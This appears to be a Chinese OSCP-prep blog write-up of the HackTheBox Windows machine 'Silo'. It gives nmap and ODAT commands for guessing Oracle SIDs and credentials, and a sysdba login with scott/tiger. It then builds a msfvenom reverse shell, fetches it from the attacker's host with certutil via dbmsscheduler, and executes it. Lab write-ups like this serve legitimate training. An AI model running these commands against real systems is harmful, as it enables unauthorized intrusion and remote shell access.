OSCP备考_0x44_HackThBox靶机_Windows_ Silo

Ethan医生5个月前靶场166

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)

image.png

http都没有查看到可以利用的点

这边直接是看看orcal的漏洞

odat sidguesser -s 10.129.95.188

查看SIDs

image.png


我们找到了,然后测试是否可以打开

odat tnspoison -s 10.129.95.188 -d XE --test-module

image.png


下一步就是猜测凭证

sudo odat passwordguesser -d XE -s 10.129.95.188 -p 1521 --accounts-file /usr/share/odat/accounts/accounts.txt

image.png

发现找到凭证

使用找到的凭证,登录8080,发现登录不了

因为靶机打开了5985,我就尝试登录5985,发现登陆不了


接下来就是登录数据库

这里的as sysdba 就是以管理员的身份命令

sqlplus scott/tiger@10.129.95.188:1521/XE as sysdba

image.png

生成一个监听的挡案

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.43 LPORT=5555 -f exe >shell.exe

然后上传

odat dbmsscheduler -U scott -P tiger -p 1521 -d XE -s 10.129.95.188 --exec "certutil.exe -urlcache -split -f http://10.10.16.43:8000/shell_5555.exe c:\users\public\shell.exe" --sysdba

上传完之后执行

odat dbmsscheduler -U scott -P tiger -p 1521 -d XE -s 10.129.95.188 --exec "c:\users\public\shell.exe" --sysdba

image.png

image.png


image.png



标签: OSCP

相关文章

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

 OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x56_HackThBox靶机_Windows_worker

OSCP备考_0x56_HackThBox靶机_Windows_worker

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.29 (扫描TCP)svn list svn://10.129.2.29svn lo...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。